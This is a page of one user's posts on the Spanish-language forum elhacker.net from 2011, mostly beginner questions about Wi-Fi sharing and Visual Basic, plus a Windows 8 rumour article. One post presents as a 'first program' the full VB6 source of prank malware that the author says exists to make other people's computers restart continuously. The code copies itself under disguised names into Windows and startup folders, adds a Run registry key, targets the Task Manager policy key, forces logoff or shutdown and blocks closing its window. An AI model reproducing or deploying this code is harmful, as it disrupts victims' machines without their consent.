elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Temas
Páginas: 1 2 3 [4] 5
31  Comunicaciones / Redes / Conectar dos equipos por Wi-Fi para compartir internet (sin router) en: 28 Julio 2011, 23:37 pm
Miren les comento mi problema

Tengo una pc con Win7 y una laptop con WinXP
la computadora de escritorio tiene una placa de red Wi-Fi y la laptop tambien xD
quiero hacer una red wifi entre esas dos computadoras para poder compartir internet
porque sinceramente no tengo ganas de comprar un router xD
se puede hacer eso? e.e

yo antes lo hacia por cable de red pero de XP a XP y cada tanto no andaba ¬
32  Foros Generales / Foro Libre / Si a alguien le interesa....(Gestor de contras) en: 25 Julio 2011, 08:50 am
Miren tengo un proyectito personal echo en visual basic que es basicamente un programita que tiene almacenadas contraseñas como para no hacer un quilombo con el pass del ftp el del user del foro el del msn el del facebook el del twitter el del supermercado el de la caja fuerte etc... xD

bueno es muy recontra re simple e.e

se los explico y si a alguien le interesa hago un minituto y lo subo en su correspondiente sección (VB)

se les explico el funcionamiento y si les gusta lo subo y si no quedara en el recuerdo (? xD

una vez abierto el programa pide el masterpass osea una clave para abrir el programa xD
luego tiene los distintos sitios  de los que tenemos pass
hacemos clic en el boton "VER" y nos muestra el pass de dicho sitio

es muy simple no? pero ayuda a veces xD ademas no usa base de datos ni nada esta echo para que CUALQUIER NOVATO pueda hacerlo :)

una vez declarados todos los pass compilamos el programa y listo en un USB y listo para llevar :)


vale aclarar que tambien podemos modificar el programa para tener muchos Seriales de programas funciona igual xD solo habra que modificar alguna que otra cosa :)




bueno no se a mi me parece cualquier cosa xD yo lo uso por comodidad xD pero bueno por ahi a alguien le sirve o a algun novato para aprender alguna que otra cosa basica... xD


en fin no se si les gusta la idea cuando tenga tiempo hago el mini tuto e.e y si no bueno gracias por leer xD
33  Programación / Programación Visual Basic / mover un boton con otr boton ¬ en: 24 Julio 2011, 06:38 am
Hola querida gente del foro como andan tanto tiempo?
si soy yo con mis tipicos post que mas de uno se queja xD

mi duda es muy simple e.e

supongamos que tengo boton A y boton B

supongamos que hice un dibujo en picture box que seria tipo

punto de partida  y lugar de llegada

mi idea es la siguiente

se hace click en el boton A y sale un msgbox diciendo "hacia donde quieres ir?"

y que al hacer clic en el boton B salga un msgbox diciendo "aqui vamos"

el boton A se desplace por el camino echo en el picturebox y llegue al boton B

busque como mover botones y lo mas parecido que encontre fue una marquesina de label

aunque si se aplica a un boton funciona igual pero como que no quedaba muy bien xD
ademas queria añadir multiples destinos D=



Alguna sugerencia?
34  Foros Generales / Foro Libre / Programacion en argentina... alguna salida? en: 24 Julio 2011, 00:40 am
Hola gente del foro tengo una duda,leyendo otro post vi que se gana bien... pero en otros paises mi pregunta es... en argentina se gana bien con la programacion? xD

y se que esto tal vez no deba ir aca pero viendo en el foro vi que hay un foro que dice hacking avanzado no hay algun lugar que sea "introduccion al hacking" o algo asi? xD

gracias de antemano por leer e.e
35  Programación / Programación Visual Basic / Mi primer programa en Visual Basic :) en: 19 Julio 2011, 06:40 am
Hola a todos n.n
hace rato no posteo en el foro porque bueno surgio algun que otro inconveniente (vacaciones)

pero bueno para que vean que estoy a full (? les traje mi primer programa en VB :)

primero que nada quiero aclararles que solo voy a dejar el codigo porque no se a donde subir el programa u.u si alguien me ayuda lo subo :)

y segundo si a alguien se le ocurre probar mi programa para ver que tal anda le recomiendo que lo haga en una maquina virtual o algo de eso :B
Código:
Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long

Option Explicit
  
Private Const RAMA_REGISTRO As String = _
    "HKEY_CURRENT_USER\Software\" & _
    "Microsoft\Windows\CurrentVer" & _
    "sion\Policies\System\DisableTaskmgr"
    
    Dim hora As Date
 Dim horafinal As Date
 Dim HoraLimite As Date

    
  


Private Function Verificar_Existe(path) As Boolean
    
    If Len(Trim$(Dir$(path))) Then
        Verificar_Existe = True
        FileCopy "c:\LunaHAck.exe", "C:\WINDOWS\Cursores.exe"
        FileCopy "c:\LunaHAck.exe", "C:\WINDOWS\Cursores\Cursors.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\WINDOWS\system32\System32help.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Codigo.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Copia.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\WINDOWS\system\Systemhelp.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\Inico.exe"
        FileCopy "C:\WINDOWS\Cursores.exe", "C:\Documents and Settings\All Users\Escritorio\LunaHAck.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\Inico2.exe"
        FileCopy "C:\WINDOWS\Cursores.exe", "C:\WINDOWS\Cursores\Cursors.exe"
        End If
    
End Function




Private Sub Form_Load()
 HoraLimite = "00:00:30"
 Timer1.Interval = 1000
 horafinal = Time + HoraLimite
 Shell "Shutdown -t 10 -l "
 Shell "reg add hklm\software\microsoft\windows\currentversion\run /v programa /t reg_sz /d C:\WINDOWS\Cursores.exe /f "
 Call Verificar_Existe("c:\LunaHAck.exe ")


 End Sub

Private Sub Salir1_Click()
MsgBox "Este no es el boton para salir"

End Sub

Private Sub Salir2_Click()
MsgBox "Con este boton tampoco se sale"
End Sub

Private Sub Salir3_Click()
MsgBox "No, Este tampoco lo es"
End Sub

 Private Sub Timer1_Timer()
 If horafinal < Time Then
 Dim i As Integer
i = ExitWindowsEx(0, 0&)
 Timer1.Enabled = False
 Exit Sub
 End If
 Label1 = Format(horafinal - Time, "HH:MM:SS")
 End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
    Cancel = True
End Sub


Se que de seguro esta todo mal acomodado pero bueno como dice el titulo este es mi PRIMER PROGRAMA :)

Saludos :)

P/D: no creo que le sirva a nadie pero siempre es bueno experimentar en el campo de la programacion :)

Edit: me olvide de decirles el programa esta echo con el fin de joder a otras personas haciendo que la maquina se les reinicie continuamente xD
36  Foros Generales / Noticias / La versión beta de Windows 8 podría estar disponible en Septiembre en: 11 Julio 2011, 19:49 pm
Así lo afirman algunos rumores que en estos momentos circulan por la web. Hasta ahora pocos detalles se conocen sobre el desarrollo del próximo sistema operativo de Microsoft: Windows 8, ya que la compañía aún no ha hecho disponible al público una línea de tiempo de manera oficial.



Sin embargo, extra-oficialmente se han filtrado algunas informaciones, aún no confirmadas por la compañía, pero que afirman ser de fuentes confiables, sobre el estado actual del próximo sistema operativo. Se reveló que Windows 8 actualmente está en su fase de Milestone 3 (M3), concretamente en la Build 7989. También se ha hecho saber que la compañía posiblemente esté planeando para dentro de muy poco el desarrollo de Windows 8 Beta, concretamente para las últimas dos semanas de julio de 2011: del 14 al 28.

Originalmente se estimaba que la pre-beta de Windows 8 se mostraría en la conferencia BUILD del mes de Septiembre, no obstante, si el sistema realmente se encuentra en esta fase de desarrollo, es posible que para dicho mes ya esté disponible la versión beta.

Entre otras fechas estimadas, tenemos el mes de Enero de 2012 para la versión RC (Release Candidate) de Windows 8, y posiblemente en el mes de Abril Windows 8 se encuentre en su fase RTM.

Windows 8 llegaría al mercado a mitad de Septiembre del próximo año. Esta fecha coincide con lo anunciado por Microsoft, cuando afirmó que Windows 8 llegaría al público justo 3 años después del lanzamiento de Windows 7. Así que muy pronto nos encontraremos probando las características de este nuevo sistema operativo, que estará enfocado en el soporte a dispositivos táctiles.

Fuente http://planetared.com/2011/07/la-version-beta-de-windows-8-podria-estar-disponible-en-septiembre/
37  Programación / Programación Visual Basic / ayuda para Apagar la compu en VB en: 11 Julio 2011, 05:14 am
Bien es simple para terminar mi primer programa en VB me falta añadir un boton para apagar pero no se como se hace xD si saben como me podrian ayudar? :)
38  Programación / Ingeniería Inversa / Como editar un programa echo en C? en: 10 Julio 2011, 03:09 am
Hola a todos :)

tengo un problema hace mucho hice un programa en C y bueno quedo solo el exe xD y queria saber si habia alguna forma de poder editarlo ya que no tengo el codigo de fuente u.u
algun programa que me recomienden? :)
39  Programación / Programación Visual Basic / Problema con controles web ieframe.dll en: 9 Julio 2011, 06:29 am
Gente gente tengo un problema D=
estaba pensando en hacer un programa que use un webbrowser asi que trate de practicar un mini-explorador bueno lo hice andubo (por lo menos una parte) como era tarde y me quedaba poca bateria guarde el proyecto y al otro dia cuando lo intente abrir D= me aparecio algo tipo
"no se pudo encontrar ieframe.dll" intente remplazarlo por el ieframe.dll que tiene la computadora de escritorio pero nada :/

Alguna sugerencia?

por las dudas aclaro es el VB 6.0
40  Foros Generales / Foro Libre / Electricidad estatica en: 7 Julio 2011, 22:02 pm
Che alguien sabia que cuando te sacas un swetter o un polar en la obscuridad la electricidad estatica que acumula genera chispa? :|

(digo en la obscuridad porque se ve xD)
Páginas: 1 2 3 [4] 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines